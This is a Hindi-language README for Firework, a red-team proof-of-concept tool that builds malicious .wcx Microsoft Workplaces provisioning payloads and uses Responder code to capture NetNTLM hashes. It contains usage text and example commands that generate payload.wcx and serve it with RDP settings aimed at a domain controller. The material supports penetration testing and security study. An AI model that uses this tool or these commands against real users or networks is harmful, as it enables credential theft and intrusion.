
Firework एक प्रूफ-ऑफ-कॉन्सेप्ट टूल है जो Microsoft Workplaces के साथ इंटरैक्ट करने के लिए provisioning प्रक्रिया हेतु आवश्यक मान्य फ़ाइलें बनाता है।
⚠️ नोट: यह टूल अब सक्रिय रखरखाव के अंतर्गत नहीं है।
Firework एक प्रूफ ऑफ कॉन्सेप्ट टूल है जो Microsoft Workplaces के साथ इंटरैक्ट करने के लिए प्रोविज़निंग प्रक्रिया के लिए आवश्यक वैध फ़ाइलें बनाता है। यह टूल Responder से कुछ कोड भी रैप करता है ताकि उसकी NetNTLM हैश कैप्चर करने की क्षमता का लाभ उठाया जा सके, उस सिस्टम से जो Workplace फ़ीड को प्रोविज़न करता है।
इस टूल का उपयोग पैनेट्रेशन टेस्ट या रेड टीम अभ्यास के भाग के रूप में किया जा सकता है ताकि एक .wcx पेलोड (और संबंधित फ़ीड) बनाया जा सके, जिस पर क्लिक करने पर इसका उपयोग किया जा सकता है:
अधिक विस्तृत सारांश और वॉक-थ्रू के लिए SpiderLabs ब्लॉग पढ़ें।
$ pip install -r requirements.txt
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"
usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]
WCX workplace टूल
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-c COMPANY, --company COMPANY
कंपनी का नाम
-u URL, --url URL फ़ीड URL
-a APP, --app APP ऐप का नाम
-e EXT, --ext EXT ऐप एक्सटेंशन
-i ICON, --icon ICON ऐप आइकन
-l LISTEN, --listen LISTEN
TLS वेब सर्वर पोर्ट
-r RDP, --rdp RDP RDP सर्वर
-d DOMAIN, --domain DOMAIN
RDP डोमेन
-n USERNAME, --username USERNAME
RDP उपयोगकर्ता नाम
-p PASSWORD, --password PASSWORD
RDP पासवर्ड
-t CERT, --cert CERT SSL प्रमाणपत्र
-k KEY, --key KEY SSL कुंजी
मूल उदाहरण:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
बिल्ट-इन वेब सर्वर पोर्ट 443 पर शुरू होगा यदि वर्तमान निर्देशिका में cert.crt और key.pem मौजूद हैं। यह responder के साथ एक NTLM चैलेंज को बाध्य करेगा। यदि ये फ़ाइलें मौजूद नहीं हैं, तो टूल आपकी अपनी होस्टिंग के लिए सभी फ़ाइलों को स्थानीय निर्देशिका में लिखेगा।
यदि आप बिल्ट-इन वेब सर्वर को वैकल्पिक पोर्ट पर शुरू करना चाहते हैं, तो नीचे दिए अनुसार -l फ़्लैग का उपयोग करें:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
आप सर्व किए जाने वाले .rdp फ़ाइल में कुछ अनुकूलन भी जोड़ सकते हैं।
नोट: .rdp फ़ाइलों में संग्रहीत पासवर्ड डिफ़ॉल्ट कॉन्फ़िग में संभवतः अनदेखा किए जाते हैं।
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>
टूल चलाने के बाद 'payload.wcx' वर्तमान निर्देशिका में लिखा जाएगा। यह फ़ाइल वह है जिस पर क्लिक करने पर प्रोविज़निंग प्रक्रिया शुरू होती है।
Firework
David Middlehurst द्वारा बनाया गया कॉपीराइट (C) 2018 Trustwave Holdings, Inc.
यह प्रोग्राम मुफ्त सॉफ्टवेयर है: आप इसे GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत पुनर्वितरित और/या संशोधित कर सकते हैं, जैसा कि फ्री सॉफ्टवेयर फाउंडेशन द्वारा प्रकाशित किया गया है, या तो लाइसेंस का संस्करण 3, या (आपके विकल्प पर) किसी भी बाद के संस्करण के तहत।
यह प्रोग्राम इस उम्मीद में वितरित किया जाता है कि यह उपयोगी होगा, लेकिन बिना किसी वारंटी के; यहां तक कि व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी के बिना। अधिक जानकारी के लिए GNU जनरल पब्लिक लाइसेंस देखें।